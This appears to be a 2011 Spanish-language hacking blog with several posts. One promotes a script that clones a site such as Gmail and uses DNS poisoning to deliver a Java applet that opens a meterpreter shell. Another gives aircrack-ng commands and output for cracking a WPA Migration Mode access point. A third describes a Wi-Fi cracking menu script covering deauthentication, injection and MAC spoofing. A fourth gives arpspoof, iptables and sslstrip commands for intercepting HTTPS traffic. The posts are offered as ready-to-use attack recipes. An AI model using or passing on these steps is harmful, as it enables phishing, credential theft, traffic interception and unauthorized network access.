viernes, 21 de enero de 2011

Realizando Clone Site JAVA Attack Bypass AV


Descargar Script RockHound_clone_web_JavaAttack.sh

Este ataque se basa en la clonacion de una web a nuestra eleccion para ganar una shell en el equipo remoto.

Probado en IE6, IE7, IE8, Safari, Chrome y FireFox

Una vez clonada la web que hemos elegido, mediante envenenamiento DNS dirigimos a los Host de la red a ella, ejecutando a si automaticamente el  applet y obteniendo una meterpreter shell en el equipo victima

Ejemplo de Uso:

Seleccionamos el protocolo de la web a clonar: http o https
Seleccionamos la web a ser clonada: gmail.com

automaticamente sera lanzado ettercap para el envenenamiento en una ventana emergente y levantado el servidor en la consola principal.

Esperad a que ettercap barra la red en busca de host.

jueves, 20 de enero de 2011

WPA Modo Migración



WPA Migration Mode, es un modo de configuración soportado por los puntos de acceso Cisco Aironet para las IOS 12.2(11)JA y superiores.


Esta habilita ambos cifrados, WPA y WEP para ser asociados al AP usando el mismo identificador, (ESSID).


Para ello se asume que disponemos de lo siguiente antes de proceder:
Usamos drivers propiamente parcheados para la inyeccion.
Estamos cerca del punto de acceso
Estamos usando la versión 1.2 de Aircrack o superior.




Escenario:

  • MAC address del host atacante: 00:1f:3c:4e:88:46
  • BSSID : 00:26:0B:2A:BA:40
  • ESSID : migrate
  • Canal: 8
  • Interfaz: wlan0

    Empezamos:


    1. Creamos la interfaz monitor en el canal del AP
    2. Lanzamos airodump-ng filtrando por el canal y BSSID del AP, también filtramos para obtener solo IV´s
    3. Lanzamos Aireplay-ng para realizar autenticaciones falsas contra el AP
    4. Lanzamos Aireplay-ng en "WPA Migration Mode" para inyectar tráfico.
    5. Lanzamos Aircrack-ng para obtener la clave.


    airodump-ng -c 8 --bssid 00:26:0B:2A:BA:40 -w output mon0


     
     
    Ahora realizamos una autenticación fallida al punto de acceso.
    Para ello debe de haber al menos una mac address asociada al punto
    para que no ignore el AP nuestro tráfico. 
     
    aireplay-ng -1 0 -e migrate –a 00:26:0B:2A:BA:40
    -h 00:1f:3c:4e:88:46 mon0
     
    12:27:40 Waiting for beacon frame (BSSID: 00:26:0B:2A:BA:40) on channel 8
    12:27:40 Sending Authentication Request (Open System) [ACK]
    12:27:40 Authentication successful 12:27:40 Sending Association Request [ACK]
    12:27:40 Association successful :-) (AID: 1)

    Si obtenemos paquetes de desautenticación, lo intentamos de nuevo hasta que funcione, sin que esto tenga éxito no podemos seguir adelante.
    Vamos a lanzar aireplay-ng en "Migration Mode"

    aireplay-ng -8 -b 00:26:0B:2A:BA:40  -h 00:1f:3c:4e:88:46 mon0

    12:17:52  Waiting for beacon frame (BSSID: 00:26:0B:2A:BA:40)
    on channel 8
    Saving ARP requests in replay_arp-0811-121752.cap
    You should also start airodump-ng to capture replies.
    Remember to filter the capture to only keep WEP frames:
    "tshark -R 'wlan.wep.iv' -r capture.cap -w outcapture.cap"
    Read 318368 packets (102102 ARPs, 78 ACKs),
    sent 59315 packets..(500 pps)
     
     
    Podemos confirmar que estamos inyectando correctamente ya que
    los datas suben rápidamente.


    Finalmente Lanzamos Aircrack-ng para obtener la clave. 
     
    aircrack-ng -a 1 -b 00:26:0B:2A:BA:40 output*.cap

    Aircrack-ng 1.2
    [00:00:00] Tested 763 keys (got 47981 IVs)

    KEY FOUND! [ AA:AA:AA:AA:AA:AA:AA:AA:AA:AA:AA:AA:AA ]
    Decrypted correctly: 100%


    Traducción e interpretación: Propia.
    Fuente: Aircrack-ng

    Suite Hacking Wireless



    Descargar Script RockHound_Wireless.sh

    Voy a ir explicando cada opción paso a paso para su perfecto entendimiento.

    1. Escanear todas las redes con cifrado WEP
    • Airodump-ng escanea todos los canales, para escoger una linea en particular, presionar Ctrl + C y os pedirá varios datos.
    2. Escanear todas las redes con cifrado WPA
    • Airodump-ng escanea todos los canales, para escoger una linea en particular, presionar Ctrl + C y os pedirá varios datos.
    3. Lanzar Aireplay-ng modo Selectivo
    • Este ataque permite elegir un paquete en concreto para ser inyectado de nuevo en la red.
    • También permite lanzar un paquete modificado a la red con Packetforge-ng

    4. Lanzar Aireplay-ng modo inyectar ARP

    • El clasico ataque para la reinyección de ARP´s en la red, su funcionamiento es simple, espera a obtener paquetes ARP y vuelve a introducirlos dentro.

    5. Lanzar Aireplay-ng modo asociacion falsa

    • La autenticación falsa permite asociarse a un punto de acceso que tenga su autenticación como OPEN y Shared Key, solo es necesaria cuando no hay clientes asociados.

    6. Lanzar Aireplay-ng fragmentado para obtener PRGA

    • Cuando este ataque tenga éxito, pueda desencriptar un paquete WEP sin conocer la clave.
    • Con esto obtendremos un archivo PRGA el cual contiene datos de la red que son muy útiles a la hora de crear nuestro propio paquete.

    7. Lanzar Packetforge-ng para crear un paquete ARP

    • El propósito es crear paquetes encriptados para la inyección.
    • Pueden crearse varios tipos como, ARP, UDP, ICMP y customizados, el más común es ARP.

    8. Lanzar Aireplay-ng para inyectar el paquete creado

    • Inyecta el paquete creado de nuevo en la red para obtener multiples IV´s

    9. Lanzar Aireplay-ng para realizar una denegacion
    • Es un ataque usado para desasociar a uno o más clientes de una red.
    • Estos pueden ser desasociados por varias razones:
      1. Recuperar un ESSID Oculto 
      2. Capturar HandShake WPA/WPA2
      3. Generar multiples peticiones ARP para ser reinyectadas.


    10. Crear un diccionario para redes WLAN_XX

    • Crea automáticamente un diccionario para redes WLAN_XX

    11. Lanzar Aircrack-ng PTW para crackear la password

    • Intenta crackear la password con los datos obtenidos.

    12. Lanzar Aircrack-ng para crackear una password WLAN_XX

    • Crackear Password tipo ESSID --> WLAN_XX (Requiere wlandecrypter en /usr/sbin)

    13. Cambiar Mac Asociada

    • Cambia la mac address de tu tarjeta por la del cliente asociado al AP para que el ataque tenga éxito.

    14. Probar Si la tarjeta Inyecta correctamente

    • Realiza un testeo contra el AP escogido para ver si es cierto que la tarjeta es compatible.

    15. Modificar la sensibilidad de la tarjeta

    • Modifica la sensibilidad de la tarjeta a 1M si la distancia con el AP no es lo suficientemente cercana.

    miércoles, 19 de enero de 2011

    Man In The Middle y SSLStrip, Teoría, Práctica y Script.



     


    En la imagen de arriba se describe el histórico de los pasos que sigue una comunicación SSL entre el cliente y Servidor.

    Cuando se inicia la conexión, el nivel de registro encapsula otro protocolo, el protocolo handshake, que tiene el content_type 22.
    El cliente envía y recibe varias estructuras handshake:
    • Envía un mensaje ClientHello especificando una lista de conjunto de cifrados, métodos de compresión y la versión del protocolo SSL más alta permitida. Éste también envía bytes aleatorios que serán usados más tarde (llamados Challenge de Cliente o Reto). Además puede incluir el identificador de la sesión.
    • Después, recibe un registro ServerHello, en el que el servidor elige los parámetros de conexión a partir de las opciones ofertadas con anterioridad por el cliente.
    • Cuando los parámetros de la conexión son conocidos, cliente y servidor intercambian certificados (dependiendo de las claves públicas de cifrado seleccionadas). Estos certificados son actualmente X.509, pero hay también un borrador especificando el uso de certificados basados en OpenPGP.
    • El servidor puede requerir un certificado al cliente, para que la conexión sea mutuamente autenticicada.
    • Cliente y servidor negocian una clave secreta (simétrica) común llamada master secret, posiblemente usando el resultado de un intercambio Diffie-Hellman, o simplemente cifrando una clave secreta con una clave pública que es descifrada con la clave privada de cada uno. Todos los datos de claves restantes son derivados a partir de este master secret (y los valores aleatorios generados en el cliente y el servidor), que son pasados a través una función pseudoaleatoria cuidadosamente elegida. [...]
    Extraido: Sigue leyendo sobre SSL y TLS en  Wikipedia 



      El objetivo del ataque es interceptar dicha comunicación, enrutarla y capturar su contenido.

      Habilitamos el bit de forwarding.
      echo 1 > /proc/sys/net/ipv4/ip_forward

      Modificamos IPTables para el enrutamiento.
      iptables -t nat -A PREROUTING -p tcp --destination-p 80 -j REDIRECT --to-p 8080

      Realizamos ARP Spoofing
      arpspoof -i interfaz -t ip_víctima ip_router


      Iniciamos Finalmente SSLStript
      sslstrip -w capturaSSLStrip -a -l 8080

      Vuelvo de nuevo...

      He decidido recrear el blog para que este algo mas vistoso, en breves tendra temas de interes tutoriales, video tutoriales, scripts, etc.

      Gracias por la paciencia.

      Podeis encontrarme por el siguiente foro:

      DragonJar 


      ŖøĆқҢŎūņÐ